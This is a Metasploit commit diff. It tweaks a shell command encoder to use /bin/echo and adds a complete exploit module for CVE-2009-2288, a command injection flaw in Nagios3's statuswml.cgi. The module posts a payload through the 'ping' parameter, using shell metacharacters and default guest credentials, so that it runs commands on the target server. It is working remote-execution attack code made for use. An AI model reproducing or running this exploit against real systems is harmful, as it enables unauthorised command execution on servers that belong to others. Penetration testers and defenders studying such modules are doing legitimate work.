Add coverage for the new nagios3 cmd execution bug

git-svn-id: file:///home/svn/framework3/trunk@6936 4d416f70-5f16-0410-b530-b9f4589650da

modules/encoders/cmd/generic_sh.rb

@@ -124,13 +124,13 @@ class Metasploit3 < Msf::Encoder
 				if (state.badchars.include?("$") or state.badchars.include?("(")) 
 					raise RuntimeError
 				else
-					buf = "$(echo -ne #{hex})"
+					buf = "$(/bin/echo -ne #{hex})"
 				end
 			else
-				buf = "`echo -ne #{hex}`"
+				buf = "`/bin/echo -ne #{hex}`"
 			end
 		else
-			buf = "echo -ne #{hex}|sh"
+			buf = "/bin/echo -ne #{hex}|sh"
 		end
 		
 		# Remove spaces from the command string

modules/exploits/unix/webapp/nagios3_statuswml_ping.rb

@@ -0,0 +1,114 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::HttpClient
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Nagios3 statuswml.cgi Ping Command Execution',
+			'Description'    => %q{
+				This module abuses a metacharacter injection vulnerability in the
+			Nagios3 statuswml.cgi script. This flaw is triggered when shell
+			metacharacters are present in the parameters to the ping and
+			traceroute commands.
+			},
+			'Author'         => [ 'hdm' ],
+			'License'        => MSF_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2009-2288' ]
+				],
+			'Platform'       => ['unix'],
+			'Arch'           => ARCH_CMD,				
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'       => 1024,
+					'DisableNops' => true,
+					'BadChars'    => '<>',
+					'Compat'      =>
+						{
+							'RequiredCmd' => 'generic perl ruby bash telnet',
+						}
+				},
+			'Targets'        => 
+				[
+					[ 'Automatic Target', { }]
+				],
+			'DefaultTarget' => 0))
+			
+			register_options(
+				[
+					OptString.new('URI',  [true, "The full URI path to statuswml.cgi", "/nagios3/cgi-bin/statuswml.cgi"]),
+					OptString.new('USER', [true, "The username to authenticate with", "guest"]),
+					OptString.new('PASS', [true, "The password to authenticate with", "guest"]),								
+				], self.class)
+	end
+	
+	def exploit
+
+		print_status("Sending request to http://#{rhost}:#{rport}#{datastore['URI']}")
+		
+		res = send_request_cgi({
+			'method'    => 'POST',
+			'uri'       => datastore['URI'],	
+			'headers'   => { 'Authorization' => 'Basic ' + Rex::Text.encode_base64("#{datastore['USER']}:#{datastore['PASS']}") },
+			'vars_post' => 
+			{
+				'ping' => ';' + payload.encoded + '&'
+			}
+		}, 10)
+		
+		
+		if(not res)
+			if session_created?
+				print_status("Session created, enjoy!")
+			else
+				print_error("No response from the server")
+			end
+			return
+		end
+		
+		if(res.code == 401)
+			print_error("Please specify correct values for USER and PASS")
+			return
+		end
+		
+		if(res.code == 404)
+			print_error("Please specify the correct path to statuswml.cgi in the URI parameter")
+			return
+		end
+		
+		if(res.body =~ /Invalid host name/)
+			print_error("This server has already been patched")
+			return
+		end
+		
+		if(res.body =~ /p mode='nowrap'>(.*)<\/p>/smi)
+			print_status("Displaying command response")
+			out = $1
+			print_line(out.gsub(/<b>|<\/b>|<br.>/, ''))
+			return
+		end
+
+		
+		print_status("Unknown response, displaying raw HTML")
+		print_line(res.body)
+	end
+
+end